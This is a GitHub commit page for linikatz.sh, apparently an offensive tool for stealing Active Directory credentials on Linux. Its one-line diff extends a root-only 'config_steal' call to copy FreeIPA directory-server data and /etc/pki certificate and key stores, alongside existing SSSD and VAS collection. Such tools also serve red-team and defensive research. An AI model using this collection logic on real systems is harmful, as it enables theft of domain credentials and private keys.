Skip to content

Commit

Permalink
Improved IPA support, now grabs LDAP and PKI artefacts
Browse files Browse the repository at this point in the history
  • Loading branch information
timb-machine authored Aug 3, 2021
1 parent baf3733 commit ed6f5ac
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion linikatz.sh
Original file line number Diff line number Diff line change
Expand Up @@ -302,7 +302,7 @@ do
done
header
stdio_message_log "freeipa-check" "FreeIPA AD configuration"
[ "$(needs_root)" -eq 1 ] && config_steal /etc/ipa || stdio_message_warn "needs" "not running as root"
[ "$(needs_root)" -eq 1 ] && config_steal /var/lib/dirsrv /etc/dirsrv /etc/pki /etc/ipa || stdio_message_warn "needs" "not running as root"
stdio_message_log "sss-check" "SSS AD configuration"
[ "$(needs_root)" -eq 1 ] && config_steal /var/lib/sss /etc/sssd || stdio_message_warn "needs" "not running as root"
stdio_message_log "vintella-check" "VAS AD configuration"
Expand Down

0 comments on commit ed6f5ac

Please sign in to comment.